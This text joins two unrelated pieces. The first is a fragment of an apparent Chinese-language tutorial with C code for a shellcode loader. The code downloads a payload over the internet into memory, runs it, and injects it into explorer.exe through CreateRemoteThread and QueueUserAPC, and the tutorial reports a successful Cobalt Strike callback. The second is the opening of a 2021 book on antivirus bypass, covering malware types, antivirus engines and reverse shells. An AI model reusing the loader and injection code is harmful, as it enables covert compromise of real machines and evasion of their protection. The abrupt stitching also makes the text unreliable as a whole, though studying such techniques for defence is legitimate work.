lpbuff = addr; while (TRUE) { BOOL status = fnInternetReadFile(req, lpbuff, 0x2000, &size); //printf("[*] size: %d \n", size); if (status && size < 0x2000) { break; } else { lpbuff = (LPVOID)((UINT64)lpbuff + size); } 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 最后再 main 函数中进⾏调⽤: 那这段代码要怎么才能像真正的shellcode⼀样,在其他进程的进程空间中执⾏呢? 我们参考shellcode注⼊相关的⽅法,https://github.com/knownsec/shellcodeloader 接下来只演示两种⽅式,分别是 CreateRemoteThread 以及 QueueUserAPC 。 CreateRemoteThread注⼊⽅法 使⽤ CreateRemoteThread 进⾏注⼊⾮常简单,看它的定义如下: } ((void(*)())addr)(); } 31 32 33 int WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR     lpCmdLine, int       nShowCmd ) { shellcode(&shelldata); return 0; } 1 2 3 4 5 6 7 8 9 HANDLE CreateRemoteThread( [in]  HANDLE                 hProcess, [in]  LPSECURITY_ATTRIBUTES  lpThreadAttributes, [in]  SIZE_T                 dwStackSize, [in]  LPTHREAD_START_ROUTINE lpStartAddress, [in]  LPVOID                 lpParameter, [in]  DWORD                  dwCreationFlags, [out] LPDWORD                lpThreadId ); 1 2 3 4 5 6 7 8 9 线程函数其实是接受⼀个指针类型的参数 lpParameter ,我们只需要这个参数⾥保存 shel ldata 的指针即可,另外不要忘记把 shelldata 写到⽬标进程中,代码示例如下: 可以看到代码已经注⼊并执⾏成功,cs上已经成功上线。 DWORD pid = getPID("explorer.exe"); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); SIZE_T remoteBuffer = (SIZE_T)VirtualAllocEx(process, NULL, 0x10000, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); SIZE_T size = 0; WriteProcessMemory(process, (LPVOID)remoteBuffer, &shelldata, sizeof(shelldata), &size); WriteProcessMemory(process, (LPVOID) (remoteBuffer+size), shellcode , (SIZE_T)shellcode_end - (SIZE_T)shellcode , NULL); CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)(remoteBuffer + size), (LPVOID)remoteBuffer, 0, NULL); CloseHandle(process); 1 2 3 4 5 6 7 8 9 QueueUserAPC注⼊⽅法 QueueUserAPC 进⾏注⼊的核⼼是如下代码: HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, TRUE, threadId); QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL); 1 2 我们向⽬标进程中写⼊的 apcRoutine 作为 PAPCFUNC 被调⽤,看⼀下 PAPCFUNC 的定义: 虽然这个函数也接受⼀个指针参数,但是这个参数的值是不受我们控制的,⽆法把相关的数 据传递给这个函数。不过这都不是什么难事,我们接下来⼀步步的来解决这个问题 ⾸先这⾥要求 apcRoutine 是⼀个单参数的函数,但是如果我们提供⼀个有两个参数的函 数,这样肯定也是不会有问题的,但是问题是第⼆个参数并不会被 caller 初始化,如果 是 x86_64 ,那就是寄存区 rdx 不会被存储有效值。 那我们能不能在调⽤函数之前,⾃⼰初始化⼀下rdx,让rdx指向shelldata?具体要怎么做 呢,想⼀下内存布局 初始化rdx时,需要先获取当前的 rip来做⾃定位,在x64平台上获取rip可以直接⽤指令 lea r dx,[rip] ,所以初始化rdx的汇编代码就是: 只要运⾏完这两条指令,rdx就指向了shelldata。那接下来 shellcode 函数就可以使⽤rdx作 为⾃⼰的第⼆个参数了,所以需要将shellcode的函数定义修改为: 然后写如下代码就可以实现APC注⼊: lea rdx,[rip] sub rdx,(0x7+sizeof(shelldata)) 1 2 void shellcode(LPVOID param,SHELLDATA * pfunc_start); 1 DWORD pid = getPID("explorer.exe"); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); SIZE_T remoteBuffer = (SIZE_T)VirtualAllocEx(process, NULL, 0x10000, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); SIZE_T sum_size = 0; SIZE_T size = 0; WriteProcessMemory(process, (LPVOID)remoteBuffer, &shelldata, sizeof(shelldata), &size); sum_size += size; BYTE code[]= { 0x48,0x8d,0x15,0x0,0x0,0x0,0x0,       // lea rdx, [rip] 0x48,0x81,0xea,0xf7,0x0,0x0,0x0,   // sub rdx, (0x7+sizeof( shelldata )) 0x90,0x90                                 //nop }; WriteProcessMemory(process, (LPVOID)(remoteBuffer + sum_size), code, sizeof(code), &size); sum_size += size; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 看⼀看⼀下写⼊之后的代码如下: WriteProcessMemory(process, (LPVOID)(remoteBuffer+ sum_size), shellcode, (SIZE_T)shellcode_end - (SIZE_T)shellcode , NULL); THREADENTRY32 te32; te32.dwSize = sizeof(te32); HANDLE Snapshot_thread = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (Snapshot_thread != INVALID_HANDLE_VALUE) { if (Thread32First(Snapshot_thread, &te32)) { do { if (te32.th32OwnerProcessID == pid) { //return te32.th32ThreadID; HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, TRUE, te32.th32ThreadID); QueueUserAPC((PAPCFUNC)(remoteBuffer + sizeof(shelldata)), threadHandle, NULL); } } while (Thread32Next(Snapshot_thread, &te32)); } } CloseHandle(Snapshot_thread); CloseHandle(process); Sleep(1000 * 60*30); 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 最后编译选项啥的不要忘记了,之前的⽂章讲过的,不再细说了。
Antivirus Bypass Techniques Learn practical techniques and tactics to combat, bypass, and evade antivirus software Nir Yehoshua Uriel Kosayev BIRMINGHAM—MUMBAI Antivirus Bypass Techniques Copyright © 2021 Packt Publishing All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book. Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information. Group Product Manager: Wilson Dsouza Publishing Product Manager: Mohd Riyan Khan Senior Editor: Rahul Dsouza Content Development Editor: Sayali Pingale Technical Editor: Sarvesh Jaywant Copy Editor: Safis Editing Project Coordinator: Ajesh Devavaram Proofreader: Safis Editing Indexer: Pratik Shirodkar Production Designer: Alishon Mendonca First published: June 2021 Production reference: 1180721 Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK. 978-1-80107-974-7 www.packt.com Recommendation "Antiviruses have always been a hindrance for threat actors and red teamers. The book Antivirus Bypass Techniques illustrates various techniques that attackers can use to evade antivirus protection. This book is a must-read for red teamers." – Abhijit Mohanta, author of Malware analysis and Detection Engineering and Preventing Ransomware Contributors About the authors Nir Yehoshua is an Israeli security researcher with more than 8 years of experience in several information security fields. His specialties include vulnerability research, malware analysis, reverse engineering, penetration testing, and incident response. He is an alumnus of an elite security research and incident response team in the Israel Defense Forces. Today, Nir is a full-time bug bounty hunter and consults for Fortune 500 companies, aiding them in detecting and preventing cyber-attacks. Over the years, Nir has discovered security vulnerabilities in several companies, including FACEIT, Bitdefender, McAfee, Intel, Bosch, and eScan Antivirus, who have mentioned him in their Hall of Fame. Special thanks to my mentor, Shay Rozen, for supporting this book in many ways. I've known Shay from my earliest days in the cybersecurity field and have learned a lot from him about security research, cyber intelligence, and red teaming. I can gladly say that Shay gave me the gift of the "hacker mindset," and for that I am grateful. Thanks, Shay; I'm honored to know you. Uriel Kosayev is an Israeli security researcher with over 8 years of experience in the information security field. Uriel is also a lecturer who has developed courses in the cybersecurity field. Uriel has hands-on experience in malware research, reverse engineering, penetration testing, digital forensics, and incident response. During his army service, Uriel worked to strengthen an elite incident response team in both practical and methodological ways. Uriel is the founder of TRIOX Security, which today provides red team and blue team security services along with custom-tailored security solutions. Big thanks to Yaakov (Yaki) Ben-Nissan for all of these years, Yaki is a great man with much passion and professionalism. These two characteristics make him who he is: a true hero and a true mentor. To me, you are more than just a mentor or teacher. Thanks for being always there for me, with all my love and respect. Reviewer Andrey Polkovnichenko Preface Section 1: Know the Antivirus – the Basics Behind Your Security Solution 1 Introduction to the Security Landscape Understanding the security landscape 4 Defining malware 5 Types of malware 6 Exploring protection systems 7 Antivirus – the basics 8 Antivirus bypass in a nutshell 11 Summary 13 2 Before Research Begins Technical requirements 16 Getting started with the research 16 The work environment and lead gathering 16 Process 17 Thread 18 Registry 18 Defining a lead 20 Working with Process Explorer 20 Working with Process Monitor 26 Working with Autoruns 32 Working with Regshot 33 Third-party engines 36 Summary 37 Table of Contents viii Table of Contents 3 Antivirus Research Approaches Understanding the approaches to antivirus research 40 Introducing the Windows operating system 40 Understanding protection rings 42 Protection rings in the Windows operating system 43 Windows access control list 45 Permission problems in antivirus software 47 Insufficient permissions on the static signature file 47 Improper privileges 47 Unquoted Service Path 48 DLL hijacking 49 Buffer overflow 50 Stack-based buffer overflow 51 Buffer overflow – antivirus bypass approach 51 Summary 51 Section 2: Bypass the Antivirus – Practical Techniques to Evade Antivirus Software 4 Bypassing the Dynamic Engine Technical requirements 56 The preparation 56 Basic tips for antivirus bypass research 57 VirusTotal 58 VirusTotal alternatives 61 Antivirus bypass using process injection 63 What is process injection? 63 Windows API 66 Classic DLL injection 71 Process hollowing 72 Process doppelgänging 75 Process injection used by threat actors 77 Antivirus bypass using a DLL 81 PE files 81 PE file format structure 82 The execution 83 Table of Contents ix Antivirus bypass using timing- based techniques 85 Windows API calls for antivirus bypass 85 Memory bombing – large memory allocation 90 Summary 95 Further reading 96 5 Bypassing the Static Engine Technical requirements 98 Antivirus bypass using obfuscation 98 Rename obfuscation 99 Control-flow obfuscation 104 Introduction to YARA 105 How YARA detects potential malware 105 How to bypass YARA 109 Antivirus bypass using encryption 117 Oligomorphic code 118 Polymorphic code 118 Metamorphic code 120 Antivirus bypass using packing 121 How packers work 121 The unpacking process 121 Packers – false positives 140 Summary 141 6 Other Antivirus Bypass Techniques Technical requirements 144 Antivirus bypass using binary patching 144 Introduction to debugging / reverse engineering 144 Timestomping 157 Antivirus bypass using junk code 159 Antivirus bypass using PowerShell 161 Antivirus bypass using a single malicious functionality 163 The power of combining several antivirus bypass techniques 168 An example of an executable before and after peCloak 169 x Table of Contents Antivirus engines that we have bypassed in our research 172 Summary 173 Further reading 174 Section 3: Using Bypass Techniques in the Real World 7 Antivirus Bypass Techniques in Red Team Operations Technical requirements 178 What is a red team operation? 178 Bypassing antivirus software in red team operations 179 Fingerprinting antivirus software 180 Summary 186 8 Best Practices and Recommendations Technical requirements 188 Avoiding antivirus bypass dedicated vulnerabilities 189 How to avoid the DLL hijacking vulnerability 189 How to avoid the Unquoted Service Path vulnerability 190 How to avoid buffer overflow vulnerabilities 191 Improving antivirus detection 192 Dynamic YARA 192 The detection of process injection 197 Script-based malware detection with AMSI 207 Secure coding recommendations 211 Self-protection mechanism 212 Plan your code securely 212 Do not use old code 212 Input validation 212 PoLP (Principle of Least Privilege) 213 Compiler warnings 213 Automated code testing 213 Wait mechanisms – preventing race conditions 213 Integrity validation 213 Summary 214 Why subscribe? 215 Other Books You May Enjoy Index Preface This book was created based on 2 and a half years of researching different kinds of antivirus software. Our goal was to actually understand and evaluate which, and how much, antivirus software provides good endpoint protection. We saw in our research a lot of interesting patterns and behaviors regarding antivirus software, how antivirus software is built, its inner workings, and its detection or lack of detection rates. As human beings and creators, we create beautiful and smart things, with a lot of intelligence behind us, but as we already know, the fact – the hard fact – is that there is no such thing as perfect, and antivirus software is included in that. As we as humans develop, evolve, learn from our mistakes, try, fail, and eventually succeed with the ambition of achieving perfection, so we believe that antivirus software and other protection systems need to be designed in a way that they can adapt, learn, and evolve against ever-growing cyber threats. This is why we created this book, where you will understand the importance of growing from self-learning, by accepting the truth that there is no 100-percent-bulletproof security solutions and the fact that there will always be something to humbly learn from, develop, and evolve in order to provide the best security solution, such as antivirus software. By showing you how antivirus software can be bypassed, you can learn a lot about it, from it, and also make it better, whether it is by securing it at the code level against vulnerability-based bypasses or by writing better detections in order to prevent detection- based antivirus bypasses as much as possible. While reading our book, you will see cases where we bypassed a lot of antivirus software, but in fact, this does not necessarily suggest that the bypassed antivirus software is not good, and we do not give any recommendations for any specific antivirus software in this book. xii Preface Who this book is for This book is aimed at security researchers, malware analysts, reverse engineers, penetration testers, antivirus vendors who are interested in strengthening their detection capabilities, antivirus users, companies who want to test and evaluate their antivirus software, organizations that want to test and evaluate their antivirus software before purchase or acquisition, and other technology-oriented individuals who want to learn about new topics. What this book covers Chapter 1, Introduction to the Security Landscape, introduces you to the security landscape, the types of malware, the protection systems, and the basics of antivirus software. Chapter 2, Before Research Begins, teaches you how to gather antivirus research leads with well-known dynamic malware analysis tools in order to bypass antivirus software. Chapter 3, Antivirus Research Approaches, introduces you to the antivirus bypass approaches of vulnerability-based antivirus bypass and detection-based antivirus bypass. Chapter 4, Bypassing the Dynamic Engine, demonstrates the three antivirus dynamic engine bypass techniques of process injection, dynamic link library, and timing-based bypass. Chapter 5, Bypassing the Static Engine, demonstrates the three antivirus static engine bypass techniques of obfuscation, encryption, and packing. Chapter 6, Other Antivirus Bypass Techniques, demonstrates more antivirus bypass techniques – binary patching, junk code, the use of PowerShell to bypass antivirus software, and using a single malicious functionality. Chapter 7, Antivirus Bypass Techniques in Red Team Operations, introduces you to antivirus bypass techniques in real life, what the differences between penetration testing and red team operations are, and how to perform antivirus fingerprinting in order to bypass it in a real-life scenario. Chapter 8, Best Practices and Recommendations, teaches you the best practices and recommendations for writing secure code and enriching malware detection mechanisms in order to prevent antivirus bypassing in the future. Preface xiii To get the most out of this book You need to have a basic understanding of the security landscape, and an understanding of malware types and families. Also, an understanding of the Windows operating system and its internals, knowledge of programming languages such as Assembly x86, C/C++, Python, and PowerShell, and practical knowledge of conducting basic malware analysis. Code in Action Code in Action videos for this book can be viewed at https://bit.ly/3cFEjBw Download the color images We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/ files/downloads/9781801079747_ColorImages.pdf. xiv Preface Conventions used There are a number of text conventions used throughout this book. Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "The first option is to use rundll32.exe, which allows the execution of a function contained within a DLL file using the command line". Any command-line input or output is written as follows: RUNDLL32.EXE <dllname>,<entrypoint> <argument> Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "In order to display the full results of the Jujubox sandbox, you need to click on the BEHAVIOR tab, click on VirusTotal Jujubox, and then Full report". Tips or important notes Appear like this. Disclaimer The information within this book is intended to be used only in an ethical manner. Do not use any information from the book if you do not have written permission from the owner of the equipment. If you perform illegal actions, you are likely to be arrested and prosecuted to the full extent of the law. Packt Publishing, Nir Yehoshua, and Uriel Kosayev (the authors of the book) do not take any responsibility if you misuse any of the information contained within the book. The information herein must only be used while testing environments with proper written authorizations from appropriate persons responsible. Get in touch Feedback from our readers is always welcome. General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at customercare@packtpub.com. Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata, selecting your book, clicking on the Errata Submission Form link, and entering the details. Preface xv Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at copyright@packt.com with a link to the material. If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors. packtpub.com. Reviews Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you! For more information about Packt, please visit packt.com. Section 1: Know the Antivirus – the Basics Behind Your Security Solution In this first section, we’ll explore the basics of antivirus software, get to know the engines behind antivirus software, collect leads for research, and learn about the authors’ two bypass approaches in order to prepare us for understanding how to bypass and evade antivirus software. This part of the book comprises the following chapters: • Chapter 1, Introduction to the Security Landscape • Chapter 2, Before Research Begins • Chapter 3, Antivirus Research Approaches 1 Introduction to the Security Landscape This chapter provides an overview of our connected world. Specifically, it looks at how cybercriminals in the cyber landscape are becoming more sophisticated and dangerous. It looks at how they abuse the worldwide connectivity between people and technology. In recent years, the damage from cyberattacks has become increasingly destructive and the majority of the population actually thinks that antivirus software will protect them from all kinds of cyber threats. Of course, this is not true and there are always security aspects that need to be dealt with in order to improve antivirus software's overall security and detections. Many people and organizations believe that if they have antivirus software installed on their endpoints, they are totally protected. However, in this book, we will demonstrate – based on our original research of several antivirus products – why this is not completely true. In this book, we will describe the types of antivirus engines on the market, explore how antivirus software deals with threats, demonstrate the ways in which antivirus software can be bypassed, and much more. 4 Introduction to the Security Landscape In this chapter, we will explore the following topics: • Defining malware and its types • Exploring protection systems • Antivirus – the basics • Antivirus bypass in a nutshell Understanding the security landscape In recent years, the internet has become our main way to transfer ideas and data. In fact, almost every home in the developed world has a computer and an internet connection. The current reality is that most of our lives are digital. For example, we use the web for the following: • Shopping online • Paying taxes online • Using smart, internet-connected televisions • Having internet-connected CCTV cameras surrounding our homes and businesses. • Social media networks and website that we are using in a daily basis to share information with each other. This means that anyone can find the most sensitive information, on any regular person, on their personal computer and smartphone. This digital transformation, from the physical world to the virtual one, has also unfolded in the world of crime. Criminal acts in cyberspace are growing exponentially every year, whether through cyberattacks, malware attacks, or both. Cybercriminals have several goals, such as the following: • Theft of credit card data • Theft of PayPal and banking data • Information gathering on a target with the goal of later selling the data • Business information gathering Of course, when the main goal is money, there's a powerful motivation to steal and collect sellable information. Defining malware 5 To deal with such threats and protect users, information security vendors around the world have developed a range of security solutions for homes and enterprises: Network Access Control (NAC), Intrusion Detection Systems (IDS)/Intrusion Prevention Systems (IPS), firewalls, Data Leak Prevention (DLP), Endpoint Detection and Response (EDR), antiviruses, and more. But despite the wide variety of products available, the simplest solution for PCs and other endpoints is antivirus software. This explains why it has become by far the most popular product in the field. Most PC vendors, for example, offer antivirus licenses bundled with a computer purchase, in the hope that the product will succeed in protecting users from cyberattacks and malware. The research presented in this book is based on several types of malicious software that we wrote ourselves in order to demonstrate the variety of bypass techniques. Later in this book, we will explore details of the malware we created, along with other known and publicly available resources, to simplify the processes of the bypass techniques we used. Now that we have understood why organizations and individuals use antivirus software, let's delve into the malware types, malicious actors, and more. Defining malware Malware is a portmanteau of malicious software. It refers to code, a payload, or a file whose purpose is to infiltrate and cause damage to the endpoint in a few different ways, such as the following: • Receive complete access to the endpoint • Steal sensitive information such as passwords and the like • Encrypt files and demand a ransom • Ruin the user experience • Perform user tracking and sell the information • Show ads to the user • Attack third-party endpoints in a botnet attack Over the years, many companies have developed antivirus software that aims to combat all types of malware threats, which have multiplied over the years, with the potential for harm also growing every single day. 6 Introduction to the Security Landscape Types of malware To understand how to bypass antivirus software, it's best to map out the different kinds of malware out there. This helps us get into the heads of the people writing antivirus signatures and other engines. It will help us recognize what they're looking for, and when they find a malicious file, to understand how they classify the malware file: • Virus: A malware type that replicates itself in the system. • Worm: A type of malware whose purpose is to spread throughout a network and infect endpoints connected to that network in order to carry out some future malicious action. A worm can be integrated as a component of various types of malware. • Rootkit: A type of malware that is found in lower levels of the operating system that tend to be highly privileged. Many times, its purpose is to hide other malicious files. • Downloader: A type of malware whose function is to download and run from the internet some other malicious file whose purpose is to harm the user. • Ransomware: A type of malware whose purpose is to encrypt the endpoint and demand financial ransom from the user before they can access their files. • Botnet: Botnet malware causes the user to be a small part of a large network of infected computers. Botnet victims receive the same commands simultaneously from the attacker's server and may even be part of some future attack. • Backdoor: A type of malware whose purpose is – as the name suggests – to leave open a "back door", providing the attacker with ongoing access to the user's endpoint. • PUP: An acronym that stands for potentially unwanted program, a name that includes malware whose purpose is to present undesirable content to the user, for instance, ads. • Dropper: A type of malware whose purpose is to "drop" a component of itself into the hard drive. • Scareware: A type of malware that presents false data about the endpoint it is installed on, so as to frighten the user into performing actions that could be malicious, such as installing fake antivirus software or even paying money for it. • Trojan: A type of malware that performs as if it were a legitimate, innocent application within the operating system (for example, antivirus, free games, or Windows/Office activation) and contains malicious functionality. • Spyware: A type of malware whose purpose is to spy on the user and steal their information to sell it for financial gain. Exploring protection systems 7 Important Note Malware variants and families are classified based not only on the main purpose or goal of the malware but also on its capabilities. For example, the WannaCry ransomware is classified as such because its main goal is to encrypt the victim's files and demand ransom, but WannaCry is also considered and classified as Trojan malware, as it impersonates a legitimate disk partition utility, and is also classified and detected as a worm because of its ability to laterally move and infect other computers in the network by exploiting the notorious EternalBlue SMB vulnerability. Now that we have understood malware and its varieties, we should take a look at the systems created to guard against these intrusions. Exploring protection systems Antivirus software is the most basic type of protection system used to defend endpoints against malware. But besides antivirus software (which we will explore in the Antivirus – the basics section), there are many other types of products to protect a home and business user from these threats, both at the endpoint and network levels, including the following: • EDR: The purpose of EDR systems is to protect the business user from malware attacks through real-time response to any type of event defined as malicious. For example, a security engineer from a particular company can define within the company's EDR that if a file attempts to perform a change to the SQLServer.exe process, it will send an alert to the EDR's dashboard. • Firewall: A system for monitoring, blocking, and identification of network-based threats, based on a pre-defined policy. • IDS/IPS: IDS and IPS provide network-level security, based on generic signatures, which inspects network packets and searches for malicious patterns or malicious flow. • DLP: DLP's sole purpose is to stop and report on sensitive data exfiltrated from the organization, whether on portable media (thumb drive/disk on key), email, uploading to a file server, or more. Now that we have understood which security solutions exist and their purpose in securing organizations and individuals, we will understand the fundamentals of antivirus software and the benefits of antivirus research bypass. 8 Introduction to the Security Landscape Antivirus – the basics Antivirus software is intended to detect and prevent the spread of malicious files and processes within the operating system, thus protecting the endpoint from running them. Over time, antivirus engines have improved and become smarter and more sophisticated; however, the foundation is identical in most products. The majority of antivirus products today are based on just a few engines, with each engine having a different goal, as follows: • Static engine • Dynamic engine (includes the sandbox engine) • Heuristic engine • Unpacking engine Of course, most of these engines have their own drawbacks. For example, the drawback of a static engine is that it is extremely basic, as its name implies. Its goal is to identify threats using static signatures, for instance, the YARA signature (YARA, Welcome to YARA's documentation, https://yara.readthedocs.io/en/stable/). These signatures are written from time to time and updated by antivirus security analysts on an almost daily basis. During a scan, the static engine of the antivirus software conducts comparisons of existing files within the operating system to a database of signatures, and in this way can identify malware. However, in practice, it is impossible to identify all malware that exists using static signatures because any change to a particular malware file may bypass a particular static signature, and perhaps even completely bypass the static engine. The following diagram demonstrates the static engine scanning flow: Antivirus – the basics 9 Figure 1.1 – Antivirus static engine illustration Using a dynamic engine, antivirus software becomes a little more advanced. This type of engine can detect malware dynamically (when the malware is executed in the system). The dynamic engine is a little more advanced than the static engine, and its role is to check the file at runtime, through several methods. The first method is API monitoring – the goal of API monitoring is to intercept API calls in the operating system and to detect the malicious ones. The API monitoring is done by system hooks. The second method is sandboxing. A sandbox is a virtual environment that is separated from the memory of the physical host computer. This allows the detection and analysis of malicious software by executing it within a virtual environment, and not directly on the memory of the physical computer itself. Running malware inside a sandboxed environment will be effective against it especially when not signed and detected by the static engine of the antivirus software. One of the big drawbacks of such a sandbox engine is that malware is executed only for a limited time. Security researchers and threat actors can learn what period of time the malware is executing in a sandbox for, suspend the malicious activity for this limited period of time, and only then run its designated malicious functionality. 10 Introduction to the Security Landscape The following diagram demonstrates the dynamic engine scanning flow: Figure 1.2 – Antivirus dynamic engine illustration Using a heuristic engine, antivirus software becomes even more advanced. This type of engine determines a score for each file by conducting a statistical analysis that combines the static and dynamic engine methodologies. Heuristic-based detection is a method, that based on pre-defined behavioral rules, can detect potentially malicious behavior of running processes. Examples of such rules can be the following: • If a process tries to interact with the LSASS.exe process that contains users' NTLM hashes, Kerberos tickets, and more • If a process that is not signed by a reputable vendor tries to write itself into a persistent location • If a process opens a listening port and waits to receive commands from a Command and Control (C2) server The main drawback of the heuristic engine is that it can lead to a large number of false positive detections, and through several simple tests using trial and error, it is also possible to learn how the engine works and bypass it. The following diagram demonstrates the heuristic engine scanning flow: Figure 1.3 – Antivirus heuristic engine illustration Antivirus bypass in a nutshell 11 Another type of engine that is widely used by antivirus software is called the unpacker engine. In Chapter 5, Bypassing the Static Engine, we will discuss what a packer is, how the unpacking process works, and how to bypass antivirus software using packing. One of the major drawbacks of today's advanced antivirus software centers on their use of unpackers, tools used by antivirus engines to reveal malicious software payloads that have undergone "packing," or compression, to hide a malicious pattern and thus thwart signature-based detection. The problem is that there are lots of packers today that antivirus software does not have unpackers for. In order to create automated unpacker software, security researchers from the antivirus software vendor must first perform manual unpacking – and only then can they create an automated process to unpack it and add it to one of their antivirus engines. Now that we understand the basic engines that exist in almost every antivirus software, we can move on to recognize practical ways to bypass them to ultimately reach the point where we are running malware that lets us remotely control the endpoint even while the antivirus software is up and running. Antivirus bypass in a nutshell In order to prove the central claim of this book, that antivirus software cannot protect the user completely, we decided to conduct research. Our research is practically tested based on our written and compiled EXE files containing code that actually performs the techniques we will explain later on, along with payloads that perform the bypass. The goal of this research wasn't just to obtain a shell on the endpoint, but rather to actually control it, transmit remote commands, download files from the internet, steal information, initiate processes, and many more actions – all without any alert from the antivirus software. It is important to realize that just because we were able to bypass a particular antivirus software, that does not mean that it is not good software or that we are recommending against it. The environment in which the antivirus software was tested is a LAN environment and it is entirely possible that in a WAN environment, the result might have been different. The communication between the malware and the C2 server was done using the TCP protocol in two ways: • Reverse shell • Bind shell 12 Introduction to the Security Landscape The difference between these two methods lies in how communication is transmitted from the malware to the attacker's C2 server. Using the method of the bind shell, the malware acts as a server on the victim endpoint, listening on a fixed port or even several ports. The attacker can interact with the endpoint using these listening port(s) at any time the malware is running. Using the reverse shell method, the listening fixed port will be open on the attacker's C2 server and the malware acts as a client, which in turn will connect to the attacker's C2 server using a random source port that is opened on the victim endpoint. The following diagram demonstrates the differences between reverse and bind shell: Figure 1.4 – Reverse shell and bind shell Most of the time, threat actors will prefer to base their malicious payload to interact with their C2 servers on the reverse shell technique. This is because it is relatively easy to implement; it will work behind Network Address Translation (NAT) and it will probably have the chance to fool antivirus software and firewall solutions. Summary 13 Summary In today's world, antivirus software is an integral part of security for endpoints including computers and servers, ranging from ordinary users to the largest organizations. Most companies depend on antivirus software as a first or even last line of defense against cyber threats. Because of this, we decided to research antivirus software, find vulnerabilities in their engines, and most importantly, discover ways to bypass them to prove that they simply do not provide a completely bulletproof solution. To conduct antivirus bypass research, it is crucial to understand the cybersecurity landscape. Every day, new risks and threats for home and business users emerge. It is important to get familiar with security solutions that provide better cybersecurity. Additionally, it's important, of course, to understand the basic solution, the antivirus, and to understand its inner workings and fundamentals to conduct better antivirus research. This helps both users and organizations evaluate whether their antivirus software provides the expected level of security. In the next chapter, you will learn about the fundamentals and the usage of various tools that will help in conducting antivirus research lead gathering that will eventually influence the next levels of antivirus bypass research. 2 Before Research Begins To get started researching antivirus software, we first have to take several preliminary steps to ensure that our research will be at the highest possible level and take the least possible time. Unlike "regular" research, which security researchers and reverse engineers conduct on files, antivirus research is different in its ultimate goal. We must understand that antivirus software is in fact a number of files and components joined together, and most of these files and components are operated through a central process, which is usually the antivirus's GUI-based process. In this chapter, you will understand how antivirus works in the Windows environment. Furthermore, you will learn how to gather antivirus research leads by using basic dynamic malware analysis tools to perform antivirus research. In this chapter, we will explore the following topics: • Getting started with the research • The work environment and lead gathering • Defining a lead • Working with Process Explorer 16 Before Research Begins • Working with Process Monitor • Working with Autoruns • Working with Regshot Technical requirements Previous experience with malware analysis tools is required. Getting started with the research The number of files and components that make up antivirus software can reach the hundreds, with each file being proficient in a different antivirus model. For example, a particular process is responsible for monitoring files within the operating system, while another is responsible for static file scanning, another process can run the antivirus service on the operating system, and so on. Choosing the right files and components for investigative purposes is critical, as all research takes time. We do not want to waste our time researching a file or component that is irrelevant for bypassing antivirus software. That is why, before we conduct the research itself, we have to gather research leads and assign them a particular priority. For example, consider how much time and resources to invest in each lead. Additionally, it is important to understand that most antivirus software has a self- protection mechanism. Its goal is to make it difficult for malware to turn off the antivirus or make changes without end user authorization. Even though some antivirus software may use self-protection, it will still be possible to bypass these self-protection techniques. The work environment and lead gathering Before we start conducting antivirus research, we have to first understand some of the more fundamental aspects of how our operating system functions. Here are the three main concepts that are important to us while gathering leads. The work environment and lead gathering 17 Process A process is an object of a file that is loaded from the hard disk to the system's memory when executed. For example, mspaint.exe is the process name for the Windows Paint application: Figure 2.1 – Process Explorer in Windows 10 Figure 2.1 shows processes running on Windows 10, using the Process Explorer tool. 18 Before Research Begins Thread A thread is a unit that is assigned by the operating system in order for the CPU to execute the code (CPU instructions) in a process. In a process, you can have multiple threads but it is mandatory to have at least one main thread: Figure 2.2 – Running threads under a process in Windows 10 Registry The registry is the Windows operating system database that contains information required to boot and configure the system. The registry also contains base configurations for other Windows programs and applications: The work environment and lead gathering 19 Figure 2.3 – Illustration of the registry In addition, it will be helpful before we begin to clarify what a lead is and why it is necessary to gather leads. To research antivirus software, we used virtualization software called VMware Fusion in the Macintosh line of products. If you are using a Windows-based machine, you can use VMware Workstation to install a Windows 10 virtual operating system. After installing the operating system, we install VMware Tools and the AVG Antivirus software for lead gathering. At that point, it is important to perform a snapshot so that later on, we can go back and start fresh each time, without worrying that something will get in the way of our lead gathering. 20 Before Research Begins Defining a lead The antivirus research lead is a file that we know the purpose of in the overall operation of the antivirus software and that we have found suitable to add to our research. Lead files are the most relevant files in antivirus research. We can compare lead gathering to the first stage of a penetration test, known as reconnaissance. When we are performing reconnaissance on a target, that information is a type of lead, and we can use it to advance toward accomplishing our goal. To gather leads, we must discover how the antivirus software works on the operating system and what its flow is. As we wrote earlier, the work 